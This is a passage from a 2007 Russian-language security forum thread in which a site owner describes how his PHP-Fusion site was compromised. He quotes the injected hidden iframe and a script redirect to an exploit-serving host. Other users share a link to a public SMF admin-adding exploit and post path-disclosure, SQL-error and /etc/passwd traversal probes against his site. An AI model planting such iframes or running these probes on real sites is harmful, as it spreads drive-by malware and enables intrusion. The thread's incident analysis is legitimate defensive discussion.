ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 31.10.2007, 07:59
Фещ
Banned
Регистрация: 20.08.2007
Сообщений: 196
Провел на форуме:
6572013

Репутация: 211
По умолчанию

Цитата:
Сообщение от nbd  
А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:
ссылку на сплоит плиз
 
Ответить с цитированием

  #12  
Старый 31.10.2007, 11:47
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
Провел на форуме:
12350

Репутация: 2
По умолчанию

Цитата:
Сообщение от nbd  
А форум у Вас патченый? Нсколько я помню в Smf 1.1.4 есть ряд ошибочек Вполне возможно поломали именно его, тем более, что под него есть паблик-сплоит, позволяющий добавлять юзеров в б/д форума. Добавляем своего админа, идем в админку форума, заливаем шелл, удаляем своего админа А вообще по логам можно точно сказать как Вас поломали. Достаточно поискать запросы с Union, Select или Insert (:
Нету логов... Форум то можно хакнуть тогда, только у меня была IPB но она была паленая, и на хосте забанили мой форум, пришлось SMF ставить... н оя в ней пока вообще не раздуплился да и както пашет - пусть пашет... прос токакойто двиг после IPB туповатый...
 
Ответить с цитированием

  #13  
Старый 02.11.2007, 09:29
nbd
Познающий
Регистрация: 27.10.2006
Сообщений: 90
Провел на форуме:
560577

Репутация: 68
Отправить сообщение для nbd с помощью ICQ
По умолчанию

Цитата:
Сообщение от Фещ  
ссылку на сплоит плиз

http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:
 
Ответить с цитированием

  #14  
Старый 02.11.2007, 13:52
spyke
Познающий
Регистрация: 04.08.2005
Сообщений: 62
Провел на форуме:
350685

Репутация: 46
По умолчанию

Цитата:
Сообщение от nbd  
http://forum.whack.ru/showthread.php?t=6171
Если еще актуально (:

у меня ссылу не открыл
 
Ответить с цитированием

  #15  
Старый 02.11.2007, 22:44
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
Провел на форуме:
12350

Репутация: 2
По умолчанию

По информации от хакера, как я получил, и...

В общем, сайт хакнул не по локали. Где то в скрипте есть дырка, какая и где я незнаю, но php-fusion.int.ru хакнут щас также как и мой сайт (ВНИМАНИЕ! НА САЙТЕ ВИРУС В IFLAME!)

В общем, вот как меня хакнули:

Создана новая панель:

Код:
echo("<iframe width='0' height='0' scrolling='no' noresize src='http://novor.info/iframe.php'>");
В этом файле:

Код:
<script>document.location.replace("http://58.65.234.105/cgi-bin/nsp15/in.cgi?p=spuser");</script>
А дальше сам эксплоит. По той ссылке IE получает эксплоит и вирус, а остальные браузеры -- просто редирект на google.com.
 
Ответить с цитированием

  #16  
Старый 02.11.2007, 22:46
Фещ
Banned
Регистрация: 20.08.2007
Сообщений: 196
Провел на форуме:
6572013

Репутация: 211
По умолчанию

Цитата:
Сообщение от spyke  
у меня ссылу не открыл
Forbidden
You don't have permission to access /showthread.php on this server


wtf?
 
Ответить с цитированием

  #17  
Старый 02.11.2007, 23:51
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
Провел на форуме:
12350

Репутация: 2
По умолчанию

http://www.php-fusion.co.uk/forum/viewthread.php?forum_id=38&thread_id=18898

перевёт как мог на англ и задал вопрос на офф сайте движка.
 
Ответить с цитированием

  #18  
Старый 11.11.2007, 17:38
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

[pasкрытие путей]

Цитата:
http://alexalx-soft.com/infusions/pro_download_panel/download.php?catid[]=63
/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php

Цитата:
http://alexalx-soft.com/infusions/shoutbox_panel/shoutbox_archive.php?rowstart=28888888888888888888 8888
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3
 
Ответить с цитированием

  #19  
Старый 14.11.2007, 04:39
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
file_exists() [function.file-exists]: open_basedir restriction in effect. File(themes/../../../../../../../../../../../etc/passwd%00/theme.php) is not within the allowed path(s): (/home/vshosts/hosts/u5034/alexalx-soft.com/:/usr/home/vshosts/hosts/u5034/alexalx-soft.com/:/virtual/vshosts/hosts/u5034/alexalx-soft.com/) in /usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php on line 196
несовсем понял возможен ли инклюд локальный (чет не до ковыряния сейчас, сплю почти) но раскрытие путей опять же, в пост-переменной user_theme при редактировании профиля (edit_profile.php)
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #20  
Старый 23.11.2007, 16:23
AlexALX
Новичок
Регистрация: 27.10.2007
Сообщений: 12
Провел на форуме:
12350

Репутация: 2
По умолчанию

Цитата:
Сообщение от halkfild  
[pasкрытие путей]



/usr/home/vshosts/hosts/u5034/alexalx-soft.com/www/maincore.php



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '288888888888888888888888,20' at line 3
Такс... Щас посмотрю что там... Спс...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Раскрутка сайта (в домашних условиях) censored! Авторские статьи 19 09.06.2009 13:04
Как получить много жирных ссылок на свой сайт? Solide Snake Статьи 1 27.10.2007 12:15
26 шагов к 15 тысячам просмотрам в день Cawabunga Статьи 0 22.10.2007 19:42
Горячая и холодная раскрутка _-Ramos-_ Статьи 1 22.10.2007 19:09



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ